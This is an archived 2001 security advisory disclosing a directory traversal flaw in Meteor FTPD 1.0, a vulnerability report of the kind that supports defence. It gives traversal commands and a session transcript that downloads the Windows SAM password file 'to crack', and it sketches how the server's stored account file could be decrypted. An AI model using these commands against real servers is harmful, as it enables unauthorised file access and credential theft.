OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: brulezcartel-info.fr
Date: Thu Sep 27 2001 - 17:58:08 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ------------------------------------------------------------------------------------------------
                       Cartel Informatique - Security Advisory

    Topic: Meteor FTPD 1.0 Directory Traversal
    Advisory ID: CARTSA-2001-03
    Public Disclosure: 2001-09-27
    Author Contacted: 2001-09-15=20
    Product: Meteor FTPD 1.0
    Credits: Nicolas Brulez - Brulezcartel-info.fr
    ------------------------------------------------------------------------------------------------

    Vendor Affected:
    ================

    Charles Clark - meteorsofthotmail.com
    Freeware

    "Meteor FTP is a personal FTP server designed for the Microsoft Windows
    98 and Windows Millenium Edition operating systems."

    Note from the author:
    ================

    "Be aware that any FTP server can present security vulnerabilities on the
    computer on which it runs, potentially allowing access to system
    resources beyond those intended by the system operator.
    For this reason Meteor FTP is NOT recommended for use on systems
    hosting sensitive files such as financial records, etc."

    True, and this server is vulnerable.

    Problem:
    =======

    Cartel security team has found a Directory Traversal bug in the meteor
    FTP server, allowing remote users to browse through any directory on the
    victim's hard drive or list files outside the root directory.
    This is possible by sending commands like:

    ls ../*
    ls /../*
    ls .../*

    cd ...

    Example:
    ========

    220 Service ready for new user
    Utilisateur (192.168.160.3:(none)) : nbz
    331 User name okay, need password
    Mot de passe :
    230- Meteor FTP Version 1.0
    230 User logged in, proceed
    ftp> ls ../winnt/repair/*
    200 Command OK
    150 About to open data connection
    .
    ..
    setup.log
    secsetup.inf
    system
    software
    default
    security
    sam
    ntuser.dat
    autoexec.nt
    config.nt
    226 Closing data connection. Requested file action successful.
    ftp : 110 octets rešus dans 0,02Secondes 5,50Ko/sec.
    ftp> get ../winnt/repair/sam sam2crack
    200 Command OK
    150 About to open data connection
    226 Closing data connection. Requested file action successful.
    ftp : 20480 octets rešus dans 0,01Secondes 2048,00Ko/sec.
    ftp> ls ../*
    ..

    We wouldn't do it if we weren't logged as administrator tho.
    That's why, FTPD need to be started with user privilege.

    ftp> cd ..
    501 Directory .. does not exist
    ftp> cd ...
    250 ... is current working directory
    ftp> ls

    Extra notes:
    =========

    The FTP server seems to behave differently on Win2K and win9X.
    Some commands work under an OS, some doesn't.
    But you can exploit the FTP server on both OS anyway :)
    The server asks us a password to encrypt the login/password file.
    This password can be found in the registry in plain text..
    With this attack, it is easy to imagine a way to get it from the
    registry and to decrypt all the accounts(once we leeched it with the
    directory traversal bug).
    A computer dependant password, based on the hard disk serial for
    exemple would be more secure, and at least , better than a plain text one.
    I suggest to hash the HD serial and use it as password without using it
    in the registry of course. else it is pointless.Some algo at start
    without any use of the registry.
    Imagine an attacker getting the login file.He just have to install the
    server on his own computer,put the crypted login file,enter the password he
    leeched from the compromised computer, and he can have all
    users/password.
    With the hash trick, its own box won't decrypt it properly,because of a
    different hash value, based on the HD serial.

    Status:
    =======

    Author made a Fix.

    Fix:
    ====

    Get New version as soon as it is public.

    Greetings to my friends at:
    ===========================

    USSR, Hert, Vauban systems and qualys.

    About:
    ======

    Cartel is a company based in France, dedicated to Research about
    network
    security and application security systems.

    Security services provided are :

    - Firewalls testing
    - Network Penetration Testing
    - Application Security Testing
    - Data protecting
    - Intrusion Detection systems
    - Binary auditing
    - Secure Web hosting
    - Antivirus
    - PKI
    - VPN

    Copyright (c) Cartel informatique Security Research LABS.

    This Document is copyrighted.you can't modify it without explicit consent
    of CARTEL LABS.Feel free to publish it on any security site.

    For more informations, feel free to contact us.

    Cartel info security research labs
    mail: srlcartel-info.fr or Brulezcartel-info.fr

    http://cartel-info.fr